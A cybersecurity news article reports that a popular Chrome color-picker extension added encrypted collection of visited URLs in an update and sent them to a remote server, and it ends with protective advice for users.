A widely used Chrome extension designed to help users pick colors from web pages has come under scrutiny after researchers discovered it quietly introduced encrypted tracking functionality in a recent update.
The extension, installed by over 400,000 users, now appears to collect browsing data and obscure it before transmission.
The issue was identified by Annex Security’s researcher “@tuckner,” who shared a technical breakdown on X, after analyzing changes in version 1.4.4 of the Color Picker – Eyedropper Tool extension. By comparing the update against the previous 1.4.3 release, the researcher found newly added encryption routines embedded within the extension’s service worker, a component typically used to manage background tasks in browser extensions.
Tuckner
According to the analysis, the encryption mechanism serves no legitimate purpose for a tool whose sole function is to extract color values from web pages. Instead, it is used to obfuscate a data payload that includes users’ visited URLs and referrer information. The encrypted data is then transmitted to a remote endpoint associated with the domain colorspicker.net, specifically a path labeled “/trendingSafe.”
Tuckner noted that while the extension attempts to legitimize the behavior by including CSS color data in the transmitted payload, the implementation appears deliberately designed to conceal broader tracking activity. The use of encryption, described sarcastically by the researcher as “bitcoin-style,” makes it more difficult for users and analysts to easily inspect what information is being exfiltrated.
The extension now also introduces a consent prompt upon installation or update, asking users to agree to the collection of “anonymous data (visited URLs and CSS colors)” purportedly to support a feature called “Trending Colors.” However, the wording and presentation of the prompt raise concerns that users may accept the request without fully understanding its implications.
Tuckner
Color Picker – Eyedropper Tool is listed as a “Featured” extension on the Chrome Web Store and maintains a high rating of 4.8 stars, signaling a level of trust and vetting by Google. Its large user base and featured status make the introduction of such behavior particularly concerning, as it demonstrates how even widely trusted extensions can change functionality in ways that compromise user privacy.
Google has not issued a public statement regarding the findings, and the extension remains available on the Chrome Web Store at the time of writing.
CyberInsider
This incident adds to a growing pattern of browser extensions being leveraged for data collection and monetization after gaining user trust. In recent cases, extensions have been caught injecting ads, scanning installed add-ons, or transmitting user data without clear disclosure.
Users who have installed Color Picker – Eyedropper Tool should consider removing or disabling the extension until more clarity is provided. As a general precaution, users are advised to review extension permissions and recent updates regularly, and avoid granting unnecessary data access, especially browsing history.
Leave a Reply